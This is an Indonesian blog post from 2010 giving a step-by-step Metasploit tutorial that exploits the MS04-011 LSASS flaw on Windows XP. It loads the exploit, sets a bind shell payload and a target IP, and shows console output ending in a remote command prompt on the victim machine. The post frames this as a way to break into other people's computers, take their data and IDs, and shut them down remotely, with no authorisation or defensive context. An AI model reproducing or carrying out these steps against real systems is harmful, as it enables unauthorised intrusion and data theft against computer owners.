metasploit

Minggu, 09 Mei 2010

mungkin ini pada gak ngerti bagi yang masih awam,kalo begitu liat dulu ne...
Metasploit merupakan program yang sangat bagus untuk menguasai komputer orang lain lewat jaringan koneksi komputer.

Dengan metasploit kita bisa masuk dan mengambil apapun isi dari komputer target.PErnah jadi korban masalahnya...id sama password hilang tinggal pakai metasploit dan katanya lagi dengan metasploit kita juga bisa matiin komputer orang dr jarak jauh juga..Sebelumnya saya mohon maaf kalau topik aku ini kurang baik,atau udah basi,atau ngak jelas.

Sebelumnya makasih buat situs hackers-center.org untuk tutorialnya.

1.buka frameworknya
. trus masuk ke console (ctrl+o )

. liat smua exploit dengan perintah

msf > show exploits

2.load modul exploit (aku dikasih twnya suruh pake exploit lsass)

msf > use windows/smb/ms04_011_lsass

3.Tentukan sistem operasi target(nie contoh klo target pake xp)

msf exploit(ms04_011_lsass) > set target 2

target => 2

3.Tampilin payloadnya apa aja yg ada..

msf exploit(ms04_011_lsass) > show payloads

4. pilih payload generic/shell_bind_tcp

msf exploit(ms04_011_lsass) > set payload generic/shell_bind_tcp

payload => generic/shell_bind_tcp

5.tentuin ip target (misal ip nya xxxxxxxxxx)

msf exploit(ms04_011_lsass) > set RHOST xxxxxxxxxx
RHOST => xxxxxxxxxx

6.sekarang tinggal jalanin perintah exploit...

msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] Command shell session 3 opened (192.168.113.25:8471 -> 192.168.113.14:4444)
[*] The DCERPC service did not reply to our request



7.Selanjutnya qta tampilin...isi session kita

msf exploit(ms04_011_lsass) > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
3 Command shell 192.168.113.25:8471 -> 192.168.113.14:4444

8. terus kita masuk ke session 3 tersebut, untuk masuk ke konsol....

msf exploit(ms04_011_lsass) > sessions -i 3

[*] Starting interaction with 3...

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

selesai.
oh ya kita tidak bisa masuk komputer target kalau tidak ada celahnya dan biar kita tahu komputer target ada celahnya atau tidak,kita scan dulu pakai nmmap. Maklum pelupa.nmmapnya dah ada di framework seri 3.1 berhubung aku punya nya yg seri 3.0 tidak ada nmmap nya ya maaf kalau tidak aku upload.
sumber:http://ikhlas-jackboy.blogspot.com/2009/05/cara-memakai-metasploit.html
download metasploit ubuntu di http://www.metasploit.com/releases/framework-3.3.3-linux-i686.run

pendapat: 
0 komentar

Poskan Komentar

look ! bugs my blog

visitors